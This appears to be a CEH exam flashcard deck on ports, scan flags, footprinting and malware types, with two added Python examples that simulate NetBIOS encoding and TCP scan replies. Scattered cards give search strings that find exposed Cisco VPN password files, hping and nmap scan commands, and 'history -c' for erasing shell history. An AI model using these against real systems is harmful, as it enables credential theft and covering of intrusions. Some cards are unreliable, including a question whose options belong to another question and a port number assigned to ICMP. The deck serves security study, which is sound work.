Which of the following best describes a hybrid attack? A) Hybrid attacks make use of rainbow tables and a word list B) Hybrid attacks make use of two or more password cracking tools C) Hybrid attacks use a word list, substituting numbers and symbols in common places D) Hybrid attacks use two or more unedited word lists
B)Vulnerability
Which of the following best describes a weakness or error that can lead to a security compromise? A)Threat B)Vulnerability C)Threat agent D)Threat vector
Code designed to be run on the server
Which of the following best describes a web application?
B. BIA (Business Impact Analysis)
Which of the following best describes an effort to identify systems that are critical for continuation of operation for the organization? A. BCP B. BIA C. MTD D. DRP
A. It has few heavy security restrictions.
Which of the following best describes an intranet zone? A. It has few heavy security restrictions. B. A highly secured zone, usually employing VLANs and encrypted communication channels. C. A controlled buffer network between public and private. D. A very restricted zone with no users.
D) Intercepting traffic (MITM)
Which of the following best describes the purpose of the tool hunt? A) Footprinting B) Web application attack tool C) Vulnerability scanner D) Intercepting traffic (MITM)
A. Checking DNS replies for network mapping purposes B. Collecting information through publicly accessible sources
Which of the following is a passive footprinting method? (Choose all that apply.) A. Checking DNS replies for network mapping purposes B. Collecting information through publicly accessible sources C. Performing a ping sweep against the network range D. Sniffing network traffic through a network tap
A)Self-signed certificates
You need to exchange confidential information with a trusted partner. The partner indicates to you that he will issue certificates. These certificates are signed by the same entity that verifies the certificate's identity. Which term is used for the type of certificate issued by the partner? A)Self-signed certificates B)Online certificates C)Signed certificates D)X.509 certificates
C)Ecora Auditor Professional
You need to perform a thorough audit of your company's infrastructure configuration. The proposed security policy will require detailed vulnerability assessment and compliance with industry-accepted best practices, including SOX and PCI. Enterprise assessments, reporting, and patch management must be centralized. Which tool will BEST meet these requirements? A)Tenable Nessus Professional B)Active Network Security (Hping) C)Ecora Auditor Professional D)Network Mapper (Nmap)
C)Vulnerability assessment
You need to perform the following tasks: -Identify all resources on a target system. -Identify the potential threats to each resource on the system. -Determine a mitigation strategy to handle serious and likely threats. What is the name of this process? A)Social engineering B)System scanning C)Vulnerability assessment D)Penetration test
A. tcpdump -i eth0 -w my.log
You need to put the NIC into listening mode on your Linux box, capture packets, and write the results to a log file named my.log. How do you accomplish this with tcpdump? A. tcpdump -i eth0 -w my.log B. tcpdump -l eth0 -c my.log C. tcpdump /i eth0 /w my.log D. tcpdump /l eth0 /c my.log
D)Enable WPA on the WAP
You need to secure a wireless local area network (WLAN) without significantly reducing throughput or limiting the supported devices. Which implementation should provide the highest level of security? A)Create a VPN using OpenVPN B)Create a VPN using PPTP C)Enable WEP on the WAP D)Enable WPA on the WAP
C)PGP
You need to send an encrypted message to another user. Both you and the recipient have private and public keys. As the sender, you must obtain the recipient's public key to send the message. Which cryptographic technology are you most likely using? A)3DES B)SHA-1 C)PGP D)RC4
D) 222.173.190.239
You receive a suspicious email and note the URL is pointing to 0xDE.0xAD.0xBE.0xEF. If you enter the command ping 0xDE.0xAD.0xBE.0xEF, which IP address will resolve? A) 233.44.245.15 B) 222.87.57.238 C) 199.233.87.45 D) 222.173.190.239
Active banner grabbing Passive banner grabbing
______ involves sending specially crafted packets to remote systems and comparing responses to determine the OS. _____ involves reading error messages, sniffing network traffic, or looking at page extensions.
tiger team
a group of people, gathered together by a business entity, working to address a specific problem or goal.
Health Insurance Portability and Accountability Act (HIPAA)
addresses privacy standards with regard to medical information.
ARP Table
is a list of IP addresses and corresponding MAC addresses stored on a local computer
NetworkView
is a network discovery and management tool for Windows
Email tracking
is used to monitor the delivery of emails to an intended recipient
Scanning an entire subnet
nmap 192.168.1.0/24
Scan a single IP
nmap 192.168.1.100
GFI LanGuard
offers quality vulnerability and compliance scanning, as well as built-in patch management.
Well-known ports
port numbers 0 - 1023
XMAS scan
-sX
sniff traffic
A remote Trojan would be used to do all of the following except ___.
D. Open ports do not respond at all.
A team member runs an Inverse TCP scan. What is the expected return for an open port? A. Open ports respond with a SYN/ACK. B. Open ports respond with a RST. C. Open ports respond with a FIN. D. Open ports do not respond at all.
Script Kiddies
An unskilled hacker who compromises systems by running scripts, tools, and software developed by real hackers
A network ID
192.168.5.1/24 is an example of which kind of reserved IP address?
A broadcast address
192.168.6.255/24 is an example of which kind of reserved IP address?
IPv6 loopback address
::1
collision domain
A domain composed of all the systems sharing any given physical transport media. Systems may collide with each other during the transmission of data.
B. LOCAL_System
A hacker successfully completes a buffer overflow attack on a default IIS installation running on an older Windows 2000 machine, spawning a command shell. What privileges is the attack most likely now running with? A. Local administrator B. LOCAL_System C. IUSR_SYSTEMNAME D. Guest
buffer
A portion of memory used to temporarily store output or input data.
Computer Emergency Response Team (CERT)
Name given to expert groups that handle computer security incidents.
the design of the modern processor chips
Spectre and Meltdown are vulnerabilities found in ___ from AMD, ARM, and Intel
ACK (Acknowledgement)
TCP Flag, Acknowledges the receipt of a packet
URG (Urgent)
TCP Flag, Data contained in the packet should be processed immediately
RST (Reset)
TCP Flag, Resets a connection
PSH (Push)
TCP Flag, Sends all buffered data immediately
FIN (Finish)
TCP Flag, There will be no more transmissions
Telnet
This technique probes HTTP servers to determine the Server field in the HTTP response header
80, but on development servers ports 81 and 8080 are also used.
Which port number is commonly used for HTTP?
D. 514
Which port number is used by default for syslog? A. 21 B. 23 C. 69 D. 514
53
Which port number is used for DNS?
21
Which port number is used for FTP?
792
Which port number is used for ICMP?
137 138 139
Which port numbers are used for SMB?
161 and 162
Which port numbers are used for SNMP?
A. Full-connect
Which port-scanning method presents the most risk of discovery but provides the most reliable results? A. Full-connect B. Half-open C. Null scan D. XMAS scan
161 and 162
Which ports does SNMP use to function?
A)Gaining permission from concerned authorities
Which preliminary activity differentiates a penetration test performed by a white hat hacker and a gray hat hacker? A)Gaining permission from concerned authorities B)Gaining covert authorization from the government C)Gathering information without direct interaction with targets D)Gathering information from targets by any possible means
ipfwadm
Which program controls the packet filtering or firewall capabilities in Linux kernel versions 1.2.x and 2.0.x?
iptables
Which program replaced ipchains in Linux 2.4x?
ipchains
Which program replaced ipfwadm in Linux 2.2x?
Address Resolution Protocol (ARP)
Which protocol maps IP addresses to MAC addresses?
D) SMB
Which protocol usually listens on ports in the 137 to 139 range? A) Telnet B) Kerberos C) SNMP D) SMB
database
An organized collection of data.
web-based script
A Web shell is a ___ that allows access to a web server
history -c history -w
BASH Clearing the history
CNAME
Canonical naming allows aliases to a host
Contact e-mail
E-mail address of the person responsible for the zone file.
[location:]
Find information for a specific location
PTR
Map IP address to a hostname
UDP 137
NetBIOS Name Service (NBNS)
Promiscuous Policy
No restriction on usage of system resources
Proxy Browser for Android ProxyDroid NetShade
Proxy Tools for Mobile
ICMP Type 11 Code 0
The packet took too long to be routed to the destination; the TTL expired
Auditing
The process of recording activity on a system for monitoring and later review.
TXT
Unstructured text records
Validate an email address
VRFY is used to do which of the following?
Layer 5 Session
X.225, SCP, ZIP, etc. reside at what layer of the OSI model?
B) ICMP D) Nothing
A UDP scan can produce which two possible responses? (Choose Two) A) RST B) ICMP C) ACK D) Nothing
figure out the vulnerabilities the system possesses carry out additional attacks
(Banner Grabbing) Identifying the OS used on the target host allows an attacker to ____ and the exploits that might work on a system to further ____.
Exploit
A breach of IT system security through vulnerabilities
UDP Port Closed
- If a UDP packet is sent to a closed port, the system responds with an ICMP port unreachable message. - Spyware, Trojan horses, and other malicious applications use UDP ports.
ICMP ping
-PI
No ping
-P0
Serial, slowest scan
-T0 -T1
UDP Port Open
- There is no three-way TCP handshake for a UDP scan. - The system does not respond with a message when the port is open.
ACK scan
-sA
FIN scan
-sF
IDLE scan
-sI
SYN scan
-sS
TCP connect scan
-sT
asynchronous
1. The lack of clocking (imposed time ordering) on a bit stream. 2. An industry term referring to an implant or malware that does not require active interaction from the attacker.
RAT
A Trojan can include which of the following? A) RAT B) TCP C) Nmap D) Loki
Social engineering
A Trojan relies on ___ to be activated.
An SDK
A covert channel or backdoor may be detected using all of the following except ___. A) Nmap B) Sniffers C) An SDK D) Netcat
bit flipping
A cryptographic attack where bits are manipulated in the cipher text to generate a predictable outcome in the plain text once it is decrypted
Two (Trigger and Payload)
A logic bomb has how many parts, typically?
Insert themselves into an active session
A man-in-the-middle attack is an attack where the attacking party does which of the following?
A. nmap -A IPAddress
A member of your team enters the following command: nmap -sV -sC -O --traceroute IPAddress Which of the following nmap commands performs the same task? A. nmap -A IPAddress B. nmap -all IPAddress C. nmap -Os IPAddress D. nmap -sA IPAddress
Unicast
A packet addressed for, and intended to be received by, only one host interface
Anycast
A packet addressed in such a way that any of a large group of hosts can receive it, with the nearest host (in terms of routing distance) opening it
Multicast
A packet that is addressed in such a way that multiple host interfaces can receive it
D. Passive
A pen test member has gained access to an open switch port. He configures his NIC for promiscuous mode and sets up a sniffer, plugging his laptop directly into the switch port. He watches traffic as it arrives at the system, looking for specific information to possibly use later. What type of sniffing is being practiced? A. Active B. Promiscuous C. Blind D. Passive E. Session
A. To possibly gather information about internal hosts used in the organization's e-mail system
A pen test team member sends an e-mail to an address that she knows is not valid inside an organization. Which of the following is the best explanation for why she took this action? A. To possibly gather information about internal hosts used in the organization's e-mail system B. To start a denial-of-service attack C. To determine an e-mail administrator's contact information D. To gather information about how e-mail systems deal with invalidly addressed messages
ICMP Type 8
A ping message, requesting an Echo reply.
Baseline
A point of reference used to mark an initial state in order to manage change.
Evades detection through rewriting itself
A polymorphic virus ____
copyright
A set of exclusive rights granted by the law of a jurisdiction to the author or creator of an original work, including the right to copy, distribute, and adapt the work.
business continuity plan (BCP)
A set of plans and procedures to follow in the event of a failure or a disaster--security related or not--to get business services back up and running.
certificate authority (CA)
A trusted entity that issues and revokes public key certificates. In a network, a CA is a trusted entity that issues, manages, and revokes security credentials and public keys for message encryption and/or authentication. Within a public key infrastructure (PKI), the CA works with registration authorities (RAs) to verify information provided by the requestor of a digital certificate.
This flag is set as an acknowledgment to SYN flag. This flag is set on all segments after the initial SYN flag.
ACK (Acknowledgment)
countermeasures
Actions, devices, procedures, techniques, or other measures intended to reduce the vulnerability of an information system.
assessment
Activities to determine the extent to which a security control is implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.
Push and pop
Adding to and removing from a program stack are known as what?
Africa
AfriNIC manages what areas?
D) A nmap scan with the -sO switch
After a network scan, very few conventional ports are discovered to be open. You decide you want to discover as many protocols on the sweep as possible. Which of the following is the best choice for your port scan? A) A nessus sweep of the subnet B) A nmap scan with the -sP switch C) A nmap scan with the -se switch D) A nmap scan with the -sO switch
Common Internet File System/Server Message Block
An Application layer protocol used primarily by Microsoft Windows to provide shared access to printers, files, and serial ports. It also provides an authenticated interprocess communication mechanism.
Local configuration of an internal router by an internal administrative workstation
An administrator is configuring a network intrusion detection system (IDS). Audit rules need to be configured so that only malicious activities and policy violations are detected and logged. Which of these scenarios should you NOT add as an audit rule? A)Local configuration of an internal router by an internal administrative workstation B)Remote access of an external router from a known IP address in a blacklist database C)Remote configuration of an internal router by an unknown external laptop D)Local access of an internal router from an unknown IP address not in an employee database
An obvious method to use a system
An overt channel is ___?
Single loss Expectancy (SLE) x Annual Rate of Occurrence (ARO)
Annualized Loss Expectancy (ALE) = what?
are services on the Internet that make use of a web proxy to hide your identity.
Anonymizers
ICMP Type 0
Answer to a Type 8 Echo Request.
alter the launch daemon's
An attacker can ___ executable to maintain persistence or to escalate privileges
web-stat Alexa Monitis
An attacker uses website traffic monitoring tools such as ______, etc. to collect information about the target company.
installs reverse HTTP shell
Attackers ___ on the victim's machine, programmed to request commands from an external master who controls the reverse HTTP shell
exploit software vulnerabilities
Attackers ____ by taking advantage of programming flaws in a program, service, or within the operating system software or kernel to execute malicious code
execute malicious code
Attackers alter plist files to ___ on behalf of a legitimate user to escalate privileges
Audit data
Chronological record of system activities to enable the reconstruction and examination of the sequence of events and changes in an event.
filetype:pcf "cisco" "GroupPwd"
Cisco VPN files with Group Passwords for remote access
CSMA/CD (collision detection) CSMA/CA (collision avoidance)
Collisions within a collision domain can be managed by ___ or ___.
clear text
Community strings are transmitted in ____ in SNMPv1
CAM table
Content addressable memory table. Holds all the MAC-address-to-port mappings on a switch.
"Config" intitle:"Index of" intext:vpn
Directory with keys of VPN servers
info:string example: info:www.anycomp.com
Displays information Google stores about the page itself
link:string
Displays linked pages based on a search term.
[cache:]
Displays the web pages stored in the Google cache
1. Check for live systems 2. Check for open ports 3. Scan beyond IDS 4. Perform banner grabbing 5. Scan for vulnerabilities 6. Draw network diagrams 7. Prepare proxies
EC-Council's scanning methodology phases include the following steps:
C. Hashing
Elements of security include confidentiality, integrity, and availability. Which technique provides for integrity? A. Encryption B. UPS C. Hashing D. Passwords
eMailTrackerPro PoliteMail Yesware ContactMonkey Zendio ReadNotify DidTheyReadIt Trace Email
Email Tracking Tools
track an email and extract information
Email tracking tools allow an attacker to ____ such as sender identity, mail server, sender's IP address, location, etc.
A. FISMA
Enacted in 2002, this U.S. law requires every Federal agency to implement information security programs, including significant reporting on compliance and accreditation. Which of the following is the best choice for this definition? A. FISMA B. HIPAA C. NIST 800-53 D. OSSTM
Engineer's Toolset SNMPScanner OpUtils 5 SNScan
Enumerate with SNMP tools:
identify any vulnerable services
Enumerating RPC endpoints enables attackers to ___ on these service ports
PsTools
Enumerating user accounts using ___ suite helps to control and manage remote systems from the command line
ICMP Type 3 Code 13
Error message - Communication administratively prohibited
ICMP Type 3 Code 1
Error message - Destination host unreachable
ICMP Type 3 Code 0
Error message - Destination network unreachable
Vulnerability
Existence of a weakness, design, or implementation error that can lead to an unexpected event compromising the security of the system
"." = Root; .gov, .com, .net, .org = Top Level ("Parent Domain"); microsoft.com, google.com = Second Level ("Child Domain"); www.anyname.com = Third Level (Hosts and Resources)
Explain DNS structure.
Domain Dossier DNS Lookup
Extracting DNS Information
Folder Steganography
Files are hidden and encrypted within a folder and do not appear to normal Windows applications, including Windows Explorer
Netcraft
Restricted URLs or operating systems (OS) can be found using what? It also has a toolbar add-on for Firefox and Chrome.
ARIN whois database search
Find the range of IP addresses using ______
"[main]" "enc_GroupPwd=" ext:txt
Finds Cisco VPN client passwords (encrypted, but easily cracked)
Inurl:/remote/login?lang=en
Finds FortiGate Firewall's SSL-VPN login portal
GiliSoft File Lock Pro Folder Lock Hide Folders 5 WinMend Folder Hidden Invisible Secrets 4 Max Folder
Folder Steganography Tools
Google Yahoo! Search Ask Bing Dogpile
Footprint search engines such as ___, etc. to gather the target organization's information, such as employee details, login pages, and intranet portals, which helps in performing social engineering and other types of advanced system attacks
reduces the attacker's focus area
Footprinting ___ to a specific range of IP addresses, networks, domain names, remote access, etc.
draw a map or outline
Footprinting allows attackers to ____ the target organization's network infrastructure to learn about the actual environment they are going to break into
Hoovers LexisNexis Business Wire
Gather competitive intelligence using tools such as ___ , etc.
public network information system information personal information
Groups, forums, and blogs provide sensitive information about a target such as ______
Algorithms
Hide data in mathematical functions used in compression algorithms
C) He cannot spoof his IP and successfully use TCP
Hijacking BlackBerry communications is referred to as "Blackjacking". Which of the following tools is used in this effort? A) The firewall is blocking telnet traffic B) Port 23 is not the correct port for telnet C) He cannot spoof his IP and successfully use TCP D) The target is most likely a honeypot
Malware attacks Footprinting Password attacks Denial-of-Service attacks Arbitrary code execution Unauthorized access Privilege escalation Backdoor attacks Physical security threats
Host Threats
By ping scanning very slowly
How can a hacker take advantage of alert threshold settings to avoid detection?
more ~/.bash_history
How can you view the BASH saved command history?
Scan entire subnet for live host
Hping Commands: hping3 -1 10.0.1.x --rand-dest -I eth0
UDP scan on port 80
Hping Commands: hping3 -2 10.0.0.25 -p 80
IDLE Scan: Step 3
(attacker) --> IPID probe: SYN+ACK packet --> (zombie); (zombie) --> Response: RST packet, IPID=31339. The IPID was incremented by 2 since step 1, so port 80 must be open.
IDLE Scan: Step 1
(attacker) --> IPID probe: SYN+ACK packet --> (zombie); (zombie) --> Response: RST packet, IPID=31337
TTL Expired
If a packet capture device shows the packet as Type 11, Code 0, what does it mean?
Administratively Blocked
If a packet capture device shows the packet as Type 3, Code 13, what does it mean?
nbtstat -A IPADDRESS
If you want to bring up a remote system table using NetBIOS.
eavesdropping shoulder surfing dumpster diving
Implement social engineering techniques such as ____ that may help to gather more critical information about the target organization
setuid setgid
In Linux and MacOS, if an application uses ___ or ___ then the application will execute with the privileges of the owning user or group
FIN URG PSH
In Xmas scan, attackers send a TCP frame to a remote device with ___ flags set
asymmetric algorithm
In computer security, an algorithm that uses separate keys for encryption and decryption.
active passive
In enumeration, ___ OS fingerprinting involves sending crafted, nonstandard packets to a remote host and analyzing the replies. ____ OS fingerprinting involves sniffing packets without injecting any packets into the network--examining things like Time-to-Live (TTL), window sizes, Don't Fragment (DF) flags, and Type of Service (ToS) fields from the capture.
access control lists
In networking, ____ are commonly associated with firewall and router traffic-filtering rules.
collision
In regard to hash algorithms, occurs when two or more distinct inputs produce the same output.
attacker
In source routing, the ___ (the packet's sender) makes some or all of the routing decisions that would normally be left to the router
Port number
In the command telnet 192.168.5.5 23, what does the number 23 stand for?
Where messages are routed through multiple intermediaries
In what scenarios should end-to-end security mechanisms like XMLEncryption, XMLSignature, and SAML assertions be used?
Spear phishing
In what type of attack does the attacker send high-level personnel an email that appears to come from an individual who might reasonably request confidential information, but the email includes a bogus link?
Social engineering
In what type of attack does the attacker use believable language to attempt to gain confidential information, especially login credentials, from personnel?
Penetration testing
In which CEH hacking stage do you try to break the security of the system?
Scanning/Enumeration
In which phase of an attack does discovery of live hosts, access points, accounts and policies, and vulnerability assessment occur?
Reconnaissance
In which phase of an attack does information gathering, physical and social engineering, and locating network ranges occur?
Clearing Tracks
In which phase of an attack is the record of the attack wiped or obscured?
D. Maintaining access
In which phase of the attack would a hacker set up and configure "zombie" machines? A. Reconnaissance B. Covering tracks C. Gaining access D. Maintaining access
SOA (Start of Authority)
DNS record that indicates authority for the domain (names the zone's primary name server and responsible contact, and carries the zone serial and timers)
Cyber Terrorists
Individuals with wide range of skills, motivated by religious or political beliefs to create fear by large-scale disruption of computer networks
Gather personal information that assists to perform social engineering
Information obtained from WHOIS database assists an attacker to:
active fingerprinting
Injecting traffic into the network to identify the operating system of a device
Footprinting
Is the process of collecting as much information as possible about a target network, for identifying various ways to intrude into an organization's network system
Hack Value
It is the notion among hackers that something is worth doing or is interesting
NetScanToolsPro
It lists IPv4/IPv6 addresses, hostnames, domain names, email addresses, and URLs automatically or manually (using manual tools)
Open Source Security Testing Methodology Manual (OSSTMM)
It's a peer-reviewed formalized methodology of security testing and analysis that can "provide actionable information to measurably improve your operational security."
www.archive.org Google Cache
Keeps snapshots of sites from days gone by:
Amac Keylogger Elite Keylogger Auto Mac OS X KeyLogger KidLogger for MAC Perfect Keylogger for Mac MAC Log Manager
Keyloggers for Mac
All In One Keylogger Spyrix Personal Monitor SoftActivity Activity Monitor Elite Keylogger Keylogger Spy Monitor Micro Keylogger
Keyloggers for Windows
Latin America and the Caribbean.
LACNIC manages what areas?
Query a database
LDAP is used to perform which function?
port 389
LDAP sessions are started by a client on TCP ____ connecting to a Directory System Agent (DSA).
Physical
Layer 1 of OSI model
Data Link
Layer 2 of OSI model
Data Link layer
Layer 2 of the OSI reference model. This layer provides reliable transit of data across a physical link. Is concerned with physical addressing, network topology, access to the network medium, error detection, sequential delivery of frames, and flow control. Is composed of two sublayers: the MAC and the LLC.
Network
Layer 3 of OSI model
Transport
Layer 4 of OSI model
Security (Restrictions), Functionality (Features), Usability (GUI)
Level of security in any system can be defined by the strength of three components of this triangle.
[related:]
Lists web pages that are similar to a specified web page
[link:]
Lists web pages that have links to the specified web page
asymmetric
Literally, "not balanced or the same." In computing, ___ refers to a difference in networking speeds upstream to downstream. In cryptography, it's the use of more than one key for encryption/authentication purposes.
D)Smart cards
Management at your organization has asked you to implement an access control mechanism that uses Extensible Authentication Protocol (EAP). Which mechanism should you implement? A)Biometrics B)Access control lists (ACLs) C)Complex passwords D)Smart cards
A)Active
Management has increasingly become concerned about sniffing attacks. Which type of sniffing involves launching an ARP spoofing or traffic-flooding attack? A)Active B)Passive C)Promiscuous D)Broadcast
Metagoofil ExtractMetadata FOCA Meta Tag Analyzer BuzzStream Analyze Metadata Exiftool
MetaData Extraction Tools
TCP/UDP 135
Microsoft RPC Endpoint Mapper
Internet Security Association and Key Management Protocol (ISAKMP)
Most IPsec based VPNs use ____ , a part of IKE, to establish, negotiate, modify, and delete Security Associations (SA) and cryptographic keys in a VPN environment
80 25
Most network servers listen on TCP ports, such as web servers on port ___ and mail servers on port ___. Port is considered "open" if an application is listening on the port
Web Mirroring Tools
NCollector Studio Teleport Pro Portable Offline Browser Website Ripper Copier Gnu Wget HTTrack Web Site Copier
Alternate Data Streams
NTFS has a feature called ___ that allows attackers to hide a file behind other normal files
TCP 139
NetBIOS Session Service (SMB over NetBIOS)
<1C> GROUP
NetBIOS code and type for Domain controller.
<1B> UNIQUE
NetBIOS code and type for Domain master browser.
<00> GROUP
NetBIOS code and type for Domain name
<00> UNIQUE
NetBIOS code and type for Hostname
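The four name-table cards above are what `nbtstat -A` prints, but the wire format behind them is the RFC 1001 "first-level" encoding, in which every byte of the 16-byte name (15 name bytes plus the suffix) is split into two nibbles and written as letters A..P. As an added example, not part of the original deck, this Python implements that encoding and its inverse, then parses a constructed `nbtstat -A` listing and attaches the service meaning to each row. The `<20>` entry (Server service) is included alongside the deck's codes; the sample output is made up, not captured from a real host.

```python
import re

# Suffix byte + name type -> service, from the NetBIOS name table this deck lists,
# plus <20> UNIQUE (the Server/file service name that SMB clients look for).
NETBIOS_ROLES = {
    (0x00, "UNIQUE"): "Workstation service (hostname)",
    (0x00, "GROUP"): "Domain/workgroup name",
    (0x1B, "UNIQUE"): "Domain master browser",
    (0x1C, "GROUP"): "Domain controllers",
    (0x20, "UNIQUE"): "File server (Server service)",
}


def encode_netbios_name(name: str, suffix: int = 0x00) -> str:
    """RFC 1001 first-level encoding: 16 bytes -> 32 letters in A..P.

    The name is upper-cased and space-padded to 15 bytes, byte 16 is the
    suffix, and each byte becomes two letters: 'A' + high nibble, 'A' + low
    nibble. The wildcard name "*" is NUL-padded instead, which is why the
    NBSTAT query that nbtstat -A sends begins with "CKAAAAAAAA...".
    """
    pad = b"\x00" if name == "*" else b" "
    raw = name.upper().encode("ascii")[:15].ljust(15, pad) + bytes([suffix])
    return "".join(chr(ord("A") + (b >> 4)) + chr(ord("A") + (b & 0x0F)) for b in raw)


def decode_netbios_name(encoded: str) -> tuple:
    """Reverse of encode_netbios_name: returns (name, suffix)."""
    if len(encoded) != 32 or not all("A" <= c <= "P" for c in encoded):
        raise ValueError("first-level encoded NetBIOS names are 32 chars in A..P")
    raw = bytes(((ord(encoded[i]) - ord("A")) << 4) | (ord(encoded[i + 1]) - ord("A"))
                for i in range(0, 32, 2))
    return raw[:15].rstrip(b" \x00").decode("ascii"), raw[15]


NBTSTAT_LINE = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)")


def parse_nbtstat(output: str) -> list:
    """Parse name-table rows of `nbtstat -A <ip>` into (name, suffix, type, status)."""
    rows = []
    for line in output.splitlines():
        m = NBTSTAT_LINE.match(line)
        if m:
            rows.append((m.group(1), int(m.group(2), 16), m.group(3), m.group(4)))
    return rows


def describe(rows: list) -> list:
    """Attach the service meaning to each parsed row."""
    return [(name, f"<{suffix:02X}>", kind, NETBIOS_ROLES.get((suffix, kind), "other/unlisted"))
            for name, suffix, kind, _status in rows]


# Constructed nbtstat -A output (layout as Windows prints it; values are made up).
SAMPLE_NBTSTAT = """
           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    FILESRV01      <00>  UNIQUE      Registered
    CORP           <00>  GROUP       Registered
    FILESRV01      <20>  UNIQUE      Registered
    CORP           <1C>  GROUP       Registered
    CORP           <1B>  UNIQUE      Registered

    MAC Address = 00-0C-29-12-34-56
"""

if __name__ == "__main__":
    print("wildcard query name:", encode_netbios_name("*"))
    for row in describe(parse_nbtstat(SAMPLE_NBTSTAT)):
        print(row)
```

Seeing `CORP <1C> GROUP` and `CORP <1B> UNIQUE` on the same host is the quick way to spot a domain controller (and the domain master browser) from a single unauthenticated query on UDP 137.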
Net Master Scany Network "Swiss-Army-Knife"
Network Discovery Tools for Mobile
Network Topology Mapper OpManager NetworkView The Dude Switch Center Enterprise LANState InterMapper Friendly Pinger NetMapper Ipsonar NetBrain Enterprise Suite WhatsConnected Spiceworks-Network Mapper
Network Discovery and Mapping Tools
Nmap
Network administrators can use __ for network inventory, managing service upgrade schedules, and monitoring host or service uptime
number of packets sent
OS increments the IPID for each packet sent, thus probing an IPID gives an attacker the ___ since last probe.
legislative (government regulations) contractual (industry or group requirements) standards based (practices that must be followed in order to remain a member of a group or organization)
OSSTMM defines three types of compliance for testing: ___, ___, ___.
Know Security Posture Reduce Focus Area Identify Vulnerabilities Draw Network Map
Objectives of Footprinting
A)SNScan
One of your company's IT technicians provides you with a report that that lists SNMP-enabled devices on a network. Which tool most likely provided this information? A)SNScan B)Foundstone C)Ecora D)NetBus
Anonymizers for Mobile
Orbot Psiphon OpenDoor
DNSstuff DNS Records
Perform DNS footprinting using tools such as ___, etc. to determine key hosts in the network and perform social engineering attacks
GHDB Metagoofil SiteDigger
Perform Google hacking using tools such as ___ etc.
first layer of protection
Physical security is the ______ in any organization
console port
Physical socket provided on routers and switches for cable connections between a computer and the router/switch. This connection enables the computer to configure, query, and troubleshoot the router/switch by use of a terminal emulator and a command-line interface.
Combining pings to every address within a range
Ping sweep or ICMP Echo scanning
RPC (TCP)
Port number 135
NetBIOS (TCP, UDP)
Port number 137 - 139
IMAP (TCP)
Port number 143
SNMP (UDP)
Port number 161/162
BGP
Port number 179
FTP (TCP)
Port number 20, 21
[info:]
Presents some information that Google has about a particular web page
Stateful Firewall is Present (ACK Flag Probe)
Probe Packet (ACK) --> <-- No Response
No Firewall (ACK Flag Probe)
Probe Packet (ACK) --> <-- RST
Port is closed (Inverse TCP Flag Scanning)
Probe Packet (FIN/URG/PSH/NULL) --> <-- RST/ACK
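The ACK-probe and inverse-flag cards above, together with the Xmas/NULL and TCP connect cards elsewhere in this deck, all reduce to one table: which flags the probe carries, what comes back, and what that implies. As an added example that is not part of the original deck, this Python reads the flags byte from a raw TCP header, models how an RFC 793 host and a Windows host answer each probe (Windows replies RST to FIN/NULL/Xmas probes whatever the port state, so those scans report every port closed), optionally puts a stateful firewall in front of the target, and classifies the result the way nmap reports it. Hosts and firewall are simulated in-process; no packets are sent.

```python
import struct

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
FLAG_NAMES = [("FIN", FIN), ("SYN", SYN), ("RST", RST), ("PSH", PSH), ("ACK", ACK), ("URG", URG)]

PROBE_FLAGS = {
    "connect": SYN,            # full three-way handshake, torn down with RST
    "syn": SYN,                # half-open: never sends the final ACK
    "xmas": FIN | URG | PSH,   # "lit up like a Christmas tree"
    "null": 0,
    "fin": FIN,
    "ack": ACK,                # maps firewall rules; says nothing about open/closed
}


def build_tcp_header(sport: int, dport: int, flags: int, seq: int = 0, ack: int = 0) -> bytes:
    """Minimal 20-byte TCP header (checksum left zero; constructed test data only)."""
    data_offset = 5 << 4  # five 32-bit words, no options
    return struct.pack("!HHIIBBHHH", sport, dport, seq, ack, data_offset, flags, 8192, 0, 0)


def tcp_flags(segment: bytes) -> int:
    """The flags byte is at offset 13 of the TCP header; mask reserved/ECN bits."""
    return segment[13] & 0x3F


def flag_names(flags) -> str:
    if flags is None:
        return "no response"
    return "/".join(n for n, bit in FLAG_NAMES if flags & bit) or "none"


def target_reply(os_family: str, port_open: bool, probe: int, stateful_firewall: bool = False):
    """How a host answers a probe to one port. Returns reply flags, or None for silence.

    RFC 793 hosts: SYN -> SYN/ACK (open) or RST (closed); a probe without SYN is
    dropped silently by an open port and answered with RST by a closed one.
    Windows ignores that rule and sends RST to FIN/NULL/Xmas probes regardless.
    """
    if stateful_firewall and not probe & SYN:
        return None                        # no connection state: dropped
    if probe & SYN and not probe & ACK:
        return SYN | ACK if port_open else RST | ACK
    if probe & ACK and not probe & SYN:
        return RST                         # unsolicited ACK: RST from open and closed ports alike
    if os_family == "windows":
        return RST | ACK
    return None if port_open else RST | ACK


def classify(scan: str, reply) -> str:
    """Turn a reply (flags byte, or None for silence) into an nmap-style port state."""
    if scan in ("connect", "syn"):
        if reply is None:
            return "filtered"
        if reply & SYN and reply & ACK:
            return "open"
        if reply & RST:
            return "closed"
    elif scan in ("xmas", "null", "fin"):
        if reply is None:
            return "open|filtered"         # silence is ambiguous: open, or a firewall ate it
        if reply & RST:
            return "closed"
    elif scan == "ack":
        if reply is None:
            return "filtered: stateful firewall present"
        if reply & RST:
            return "unfiltered: no stateful firewall"
    return f"unexpected reply: {flag_names(reply)}"


def scan_port(scan: str, os_family: str, port_open: bool, stateful_firewall: bool = False) -> str:
    reply = target_reply(os_family, port_open, PROBE_FLAGS[scan], stateful_firewall)
    return classify(scan, reply)


if __name__ == "__main__":
    for scan in ("syn", "xmas", "null", "ack"):
        for os_family in ("linux", "windows"):
            print(f"{scan:5s} vs {os_family:8s} open -> {scan_port(scan, os_family, True):28s} "
                  f"closed -> {scan_port(scan, os_family, False)}")
```

The practical consequence: an inverse scan that reports every port closed is not evidence of a hardened host; check the OS first, and confirm an interesting "open|filtered" with a SYN or connect scan before trusting it.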
User
RID 1000 and up
Administrator
RID 500
Guest
RID 501
Europe, Middle East, and parts of Central Asia/Northern Africa.
RIPE manages what areas?
This flag forces a termination of communications (in both directions)
RST (Reset)
Prevent hackers Uncover vulnerabilities Strengthen an organization's security posture
Reasons why organizations recruit ethical hackers
C)Databases
Recently you discovered that several of your company's computers have experienced SQL injection attacks. Which specific entity is attacked? A)Routers B)Firewall C)Databases D)Web servers
ICMP Type 5 Code 1
Redirect datagram for the host
ICMP Type 5 Code 0
Redirect datagram for the network
Website footprinting
